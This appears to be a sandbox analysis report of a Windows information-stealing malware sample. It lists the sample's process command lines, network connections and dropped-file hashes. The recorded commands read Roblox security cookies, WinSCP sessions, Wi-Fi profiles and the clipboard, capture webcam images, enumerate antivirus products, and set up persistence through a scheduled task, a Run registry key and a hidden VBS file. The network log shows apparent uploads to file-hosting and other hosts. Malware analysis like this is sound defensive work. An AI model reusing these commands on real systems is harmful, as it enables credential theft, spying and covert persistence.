C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& { $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Moyetu_bEtaa.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask }"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\Hsv6vNcdFqVEIvCRQzk8\System\cam.4792_Admin.jpg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {netsh wlan show profile}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\1ZOrSzH8tM7c_temp.ps1""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\1ZOrSzH8tM7c_temp.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\Hsv6vNcdFqVEIvCRQzk8\System\cam.4792_Admin"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_YoJEgp.vbs\"""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_YoJEgp /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_YoJEgp.vbs /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_YoJEgp.vbs\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_YoJEgp /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_YoJEgp.vbs /f"

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_YoJEgp.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutVhSDQ.ps1" -RunAsAdministrator"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutVhSDQ.ps1" -RunAsAdministrator

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3808 --field-trial-handle=1696,16508229378409673461,12922471493039034483,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 21.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 4.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:53 202.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 store9.gofile.io udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 8.8.8.8:53 hawkish.eu udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 github.com udp
FR 163.5.121.96:443 hawkish.eu tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
DE 140.82.121.3:443 github.com tcp
FR 151.80.29.83:443 api.gofile.io tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 8.8.8.8:53 96.121.5.163.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 store8.gofile.io udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 206.168.191.31:443 store8.gofile.io tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 8.8.8.8:53 31.191.168.206.in-addr.arpa udp
FR 163.5.121.96:443 hawkish.eu tcp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
